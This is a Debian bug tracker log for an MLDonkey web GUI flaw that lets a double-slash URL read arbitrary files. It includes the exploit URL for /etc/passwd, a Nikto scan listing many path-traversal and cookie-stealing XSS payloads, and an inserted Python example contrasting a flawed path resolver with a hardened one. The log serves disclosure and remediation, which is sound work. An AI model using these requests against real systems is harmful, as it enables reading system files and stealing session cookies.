Debian Bug report logs - #516829
Http double slash request arbitrary file access vulnerability


Package: mldonkey-server; Maintainer for mldonkey-server is Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>; Source for mldonkey-server is src:mldonkey.

Reported by: Giuseppe Iuculano <giuseppe@iuculano.it>

Date: Mon, 23 Feb 2009 21:15:04 UTC

Severity: grave

Tags: security

Found in version mldonkey/2.9.5-2

Fixed in versions mldonkey/3.0.0-1, mldonkey/2.9.5-2+lenny1

Done: Florian Weimer <fw@deneb.enyo.de>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>:
Bug#516829; Package mldonkey-server. (Mon, 23 Feb 2009 21:15:06 GMT) Full text and rfc822 format available.

Acknowledgement sent to Giuseppe Iuculano <giuseppe@iuculano.it>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>. (Mon, 23 Feb 2009 21:15:06 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Giuseppe Iuculano <giuseppe@iuculano.it>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Http double slash request arbitrary file access vulnerability
Date: Mon, 23 Feb 2009 22:12:18 +0100
Package: mldonkey-server
Version: 2.9.5-2
Severity: grave
Tags: security



Hi,

MLdonkey (up to 2.9.7) has a vulnerability that allows a remote user to
access any file with the rights of the running Mldonkey daemon by
supplying a specially crafted request (ok, there's not much special about
double slash) to an Mldonkey http GUI (tcp/4080 usually).

Reference:
https://savannah.nongnu.org/bugs/?25667

Thus, the exploit would be as simple as accessing any file on a remote
host with your browser and double slash:

http://mlhost:4080//etc/passwd




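The class of flaw behind the report above, as an added example that is not part of the original report and is not MLDonkey's code (the page does not show the actual root cause). It assumes a hypothetical handler that strips a single leading slash before joining the request path to a document root, and sets it beside a canonicalize-then-contain check that also covers `../` traversal. `DOCROOT`, `naive_resolve`, `safe_resolve` and `compare` are illustrative names.

```python
import os

# Assumed document root for the web UI; illustrative, not taken from MLDonkey.
DOCROOT = "/var/lib/mldonkey/web"

# Constructed sample request paths (the double-slash form is the one reported).
SAMPLE_REQUESTS = [
    "/index.html",
    "//etc/passwd",
    "/../../../../../../../../../../etc/passwd",
]


def naive_resolve(request_path, docroot=DOCROOT):
    """Hypothetical flawed mapping: strip ONE leading slash, then join."""
    rel = request_path[1:] if request_path.startswith("/") else request_path
    # os.path.join throws away docroot when `rel` is itself absolute, and
    # "//etc/passwd" minus one slash is the absolute path "/etc/passwd".
    return os.path.join(docroot, rel)


def safe_resolve(request_path, docroot=DOCROOT):
    """Map a request path to a file under docroot, or return None."""
    if "\x00" in request_path:
        return None
    # Drop every leading slash so the remainder can never be absolute.
    rel = request_path.lstrip("/")
    root = os.path.realpath(docroot)
    # Canonicalize: collapses "." and "..", and follows symlinks that exist.
    candidate = os.path.realpath(os.path.join(root, rel))
    # Containment check on the canonical result, not on the raw string.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def compare(requests=SAMPLE_REQUESTS, docroot=DOCROOT):
    """Return {request: (naive result, safe result)} for side-by-side review."""
    return {r: (naive_resolve(r, docroot), safe_resolve(r, docroot))
            for r in requests}


if __name__ == "__main__":
    for req, (naive, safe) in compare().items():
        print(f"{req!r:50} naive={naive!r} safe={safe!r}")
```

With the hardened function the double-slash request maps to a path inside the document root, where it fails as an ordinary missing file, and the `../` request is rejected outright.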




Bug no longer marked as found in version 2.8.1-2etch1. Request was from Giuseppe Iuculano <giuseppe@iuculano.it> to control@bugs.debian.org. (Mon, 23 Feb 2009 23:03:02 GMT) Full text and rfc822 format available.

Tags added: pending Request was from Samuel Mimram <smimram@debian.org> to control@bugs.debian.org. (Tue, 24 Feb 2009 09:00:03 GMT) Full text and rfc822 format available.

Information forwarded to debian-bugs-dist@lists.debian.org, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>:
Bug#516829; Package mldonkey-server. (Tue, 24 Feb 2009 22:27:07 GMT) Full text and rfc822 format available.

Acknowledgement sent to spiralvoice@web.de:
Extra info received and forwarded to list. Copy sent to Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>. (Tue, 24 Feb 2009 22:27:08 GMT) Full text and rfc822 format available.

Message #14 received at 516829@bugs.debian.org (full text, mbox):

From: spiralvoice@web.de
To: 516829@bugs.debian.org
Subject: Re: Http double slash request arbitrary file access vulnerability
Date: Tue, 24 Feb 2009 23:24:37 +0100
Precedence: fm-user
Organization: http://freemail.web.de/
Content-Type: text/plain; charset=iso-8859-15
Content-Transfer-Encoding: quoted-printable

Hi,

this security bug is present in MLDonkey >= 2.8.4 to <= 2.9.7 and was fixed
today in MLDonkey 3.0.0.

Cheers, spiralvoice






Information stored :
Bug#516829; Package mldonkey-server. (Tue, 10 Mar 2009 14:30:05 GMT) Full text and rfc822 format available.

Acknowledgement sent to Mehdi Dogguy <mehdi.dogguy@pps.jussieu.fr>:
Extra info received and filed, but not forwarded. (Tue, 10 Mar 2009 14:30:05 GMT) Full text and rfc822 format available.

Message #19 received at 516829-quiet@bugs.debian.org (full text, mbox):

From: Mehdi Dogguy <mehdi.dogguy@pps.jussieu.fr>
To: 516829-quiet@bugs.debian.org
Subject: [Fwd: mldonkey-server: MLDokney doble slash http arbitrary file access and XSS]
Date: Tue, 10 Mar 2009 15:27:17 +0100
[Message part 1 (text/plain, inline)]
Followup-For: Bug #516829

Following-up the follow-up :)

-------- Original Message --------
Subject: mldonkey-server: MLDokney doble slash http arbitrary file access and XSS
Resent-Date: Tue, 10 Mar 2009 07:57:21 +0000 (UTC)
Resent-From: debian-ocaml-maint@lists.debian.org
Date: Tue, 10 Mar 2009 05:41:36 -0200
From: Facundo M. de la Cruz <fmdlc@debian-ar.org>
To: debian-ocaml-maint@lists.debian.org

Subject: mldonkey-server: MLDokney doble slash http arbitrary file access
Followup-For: Bug #516829
Package: mldonkey-server
Version: 2.9.5-2

*** Please type your report below this line ***

Hi, I want to report this bug in the mldonkey daemon. I am sending the nikto
(security http scan) output for your study.
Thanks


-- System Information:
Debian Release: 5.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.28.6
Locale: LANG=es_AR.UTF-8, LC_CTYPE=es_AR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/local/bin/bash

Versions of packages mldonkey-server depends on:
ii  adduser                3.110             add and remove users and groups
ii  debconf [debconf-2.0]  1.5.24            Debian configuration management sy
ii  dpkg                   1.14.25           Debian package management system
ii  libc6                  2.7-18            GNU C Library: Shared libraries
ii  libfreetype6           2.3.7-2           FreeType 2 font engine, shared lib
ii  libgcc1                1:4.3.2-1.1       GCC support library
ii  libgd2-noxpm           2.0.36~rc1~dfsg-3 GD Graphics Library version 2 (wit
ii  libjpeg62              6b-14             The Independent JPEG Group's JPEG
ii  libpng12-0             1.2.27-2          PNG library - runtime
ii  libstdc++6             4.3.2-1.1         The GNU Standard C++ Library v3
ii  mime-support           3.44-1            MIME files 'mime.types' & 'mailcap
ii  ucf                    3.0016            Update Configuration File: preserv
ii  zlib1g                 1:1.2.3.3.dfsg-12 compression library - runtime

mldonkey-server recommends no packages.

Versions of packages mldonkey-server suggests:
pn  makejail                      <none>     (no description available)

-- debconf information:
  mldonkey-server/password: (password omitted)
  mldonkey-server/repassword: (password omitted)
  mldonkey-server/max_hard_download_rate: 0
* mldonkey-server/launch_at_startup: true
  mldonkey-server/run_as_user: mldonkey
  mldonkey-server/reown_file: false
  mldonkey-server/mldonkey_group: mldonkey
  mldonkey-server/mldonkey_niceness: 0
  mldonkey-server/false_password:
  mldonkey-server/fasttrack_problem:
  mldonkey-server/mldonkey_dir: /var/lib/mldonkey
  mldonkey-server/mldonkey_move: false
  mldonkey-server/max_hard_upload_rate: 0


-- 
Facundo M. de la Cruz
IT Consultant
http://www.codigounix.com.ar/

GnuPG Fingerprint:
B24D F51D 4253 3890 EDCE  87E7 EF2D 6E1C 083D 55C9

/dev/tty0

"...There is no path to freedom, freedom is the path..."


-- 
Mehdi Dogguy مهدي الدقي
http://www.pps.jussieu.fr/~dogguy
Tel.: (+33).1.44.27.28.38
[mldonkey-server-nikto.txt (text/plain, inline)]
---------------------------------------------------------------------------
- Nikto 2.02/2.03     -     cirt.net
+ Target IP:       127.0.0.1
+ Target Hostname: localhost
+ Target Port:     4080
+ Start Time:      2009-03-11 4:27:04
---------------------------------------------------------------------------
+ Server: MLdonkey
+ OSVDB-0: GET ///etc/passwd : The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-0: GET ///etc/hosts : The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-0: GET /../../../../../../../../../../etc/passwd : It is possible to read files on the server by adding ../ in front of file name.
+ OSVDB-0: GET /themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /https-admserv/bin/index?/<script>alert(document.cookie)</script> : Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.
+ OSVDB-0: GET /clusterframe.jsp?cluster=<script>alert(document.cookie)</script> : Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.
+ OSVDB-0: GET /upload.php?type=\"<script>alert(document.cookie)</script> : Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-4619: GET /soinfo.php?\"><script>alert('Vulnerable')</script> : The PHP script soinfo.php is vulnerable to Cross Site Scripting Set expose_php = Off in php.ini.
+ OSVDB-0: GET /666%0a%0a<script>alert('Vulnerable');</script>666.jsp : Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script> : NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.
+ OSVDB-0: GET /servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.
+ OSVDB-0: GET /servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.
+ OSVDB-0: GET /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script> : Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.
+ OSVDB-0: GET /servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script> : The NetDetector install is vulnerable to Cross Site Scripting (XSS) in it's invalid login message. CA-2000-02.
+ OSVDB-0: GET /admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\"><script>alert(document.cookie)</script> : IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages. CA-2000-02.
+ OSVDB-17665: GET /SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to Cross Site Scripting
+ OSVDB-17666: GET /_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script> : Site Server is vulnerable to Cross Site Scripting
+ OSVDB-0: GET /nosuchurl/><script>alert('Vulnerable')</script> : JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html
+ OSVDB-0: GET /webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script> : Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02
+ OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.aspx : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02
+ OSVDB-0: GET /~/<script>alert('Vulnerable')</script>.asp : Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). CA-2000-02
+ OSVDB-0: GET /catinfo?<u><b>TESTING : The Interscan Viruswall catinfo script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /user.php?op=userinfo&uname=<script>alert('hi');</script> : The PhpNuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. CA-2000-02.
+ OSVDB-0: GET /user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com : Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script> : MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt; : MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script> : SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ OSVDB-0: GET /submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview : This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /ss000007.pl?PRODREF=<script>alert('Vulnerable')</script> : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P : CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: POST /servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script> : Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: POST /servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script> : Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /servlet/ContentServer?pagename=<script>alert('Vulnerable')</script> : Open Market Inc.ÊContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. CA-2000-02.
+ OSVDB-0: GET /search/index.cfm?<script>alert(\"Vulnerable\")</script> : Search agent allows Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /search.php?zoom_query=<script>alert(\"hello\")</script> : Wrensoft Zoom Search Engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /search.php?searchstring=<script>alert(document.cookie)</script> : Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.
+ OSVDB-0: GET /search.php?searchfor=\"><script>alert('Vulnerable');</script> : Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /search.asp?term=<%00script>alert('Vulnerable')</script> : ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this). CA-2000-02.
+ OSVDB-0: GET /samples/search.dll?query=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /replymsg.php?send=1&destin=<script>alert('Vulnerable')</script> : This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSs). CA-2000-02.
+ OSVDB-0: GET /pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X] : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script> : phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phptonuke.php?filnavn=<script>alert('Vulnerable')</script> : PHPNuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-32774: GET /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> : Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-32774: GET /phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script> : Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-0: GET /phpimageview.php?pic=javascript:alert('Vulnerable') : PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).  CA-2000-02.
+ OSVDB-0: GET /phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script> : phpBB is vulnerable to Cross Site Scripting (XSS), upgrade to the latest version. CA-2000-02.
+ OSVDB-0: GET /phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script> : phpBB is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script> : Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script> : Vignette server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to the latest version.
+ OSVDB-0: GET /node/view/666\"><script>alert(document.domain)</script> : Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /netutils/whodata.stm?sitename=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /nav/cList.php?root=</script><script>alert('Vulnerable')/<script> : RaQ3 server script is vulnerable to Cross Site Scripting (XSS).  CA-2000-02.
+ OSVDB-0: GET /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= : myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent : myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /myhome.php?action=messages&box=<script>alert('Vulnerable')</script> : OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script> : The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script> : The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script> : The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script> : Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script> : PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script> : The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2 : The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script> : Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script> : This install of PHPNuke's modules.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0 : Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script> : The DMOZGateway (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script> : Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script> : This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script> : The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index : Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /megabook/admin.cgi?login=<script>alert('Vulnerable')</script> : Megabook guestbook is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /mailman/listinfo/<script>alert('Vulnerable')</script> : Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. CA-2000-02.
+ OSVDB-0: GET /ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script> : IBM Directory Server 4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.
+ OSVDB-0: GET /launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02.
+ OSVDB-0: GET /launch.asp?NFuse_Application=<script>alert('Vulnerable')</script> : NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02.
+ OSVDB-0: GET /isapi/testisa.dll?check1=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /index.php/\"><script><script>alert(document.cookie)</script>< : eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script> : eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search : eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> : myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script> : myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
